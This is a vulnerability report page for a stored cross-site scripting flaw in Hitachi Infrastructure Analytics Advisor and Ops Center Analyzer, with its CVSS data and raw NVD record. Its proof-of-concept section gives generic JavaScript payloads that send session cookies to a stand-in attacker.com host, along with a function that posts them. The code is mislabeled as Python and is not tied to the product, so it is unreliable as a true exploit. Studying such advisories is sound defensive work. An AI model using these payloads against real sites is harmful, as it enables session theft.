Security Vulnerability Report
中文
CVE-2025-66444 CVSS 8.2 HIGH

CVE-2025-66444

Published: 2025-12-24 05:16:07
Last Modified: 2026-04-15 00:35:42

Description

Cross-site Scripting vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component) and Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component).This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hitachi Infrastructure Analytics Advisor: 10.0.0-00 至 11.0.5-00之前的所有版本
Hitachi Ops Center Analyzer: 10.0.0-00 至 11.0.5-00之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-66444 XSS PoC // Target: Hitachi Infrastructure Analytics Advisor / Ops Center Analyzer // Payload for stored XSS in data input fields const pocPayload = ` <script> // Cookie stealing payload document.write('<img src="http://attacker.com/steal?cookie=' + document.cookie + '"/>'); // Session hijacking fetch('http://attacker.com/exfil?session=' + encodeURIComponent(document.cookie)); </script> `; // Alternative payload (HTML event handlers) const altPayload = ` <img src=x onerror="fetch('http://attacker.com/log?data='+document.cookie)"> `; // Example POST request to inject XSS const injectXSS = async (targetUrl, sessionCookie) => { const response = await fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Cookie': sessionCookie }, body: JSON.stringify({ // Input field that accepts user data 'data_field': pocPayload, 'description': '<script>alert("XSS")</script>' }) }); return response.json(); }; console.log('XSS PoC for CVE-2025-66444'); console.log('Inject payload in affected input fields');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66444", "sourceIdentifier": "[email protected]", "published": "2025-12-24T05:16:07.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site Scripting vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component) and Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component).This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-133/index.html", "source": "[email protected]"}]}}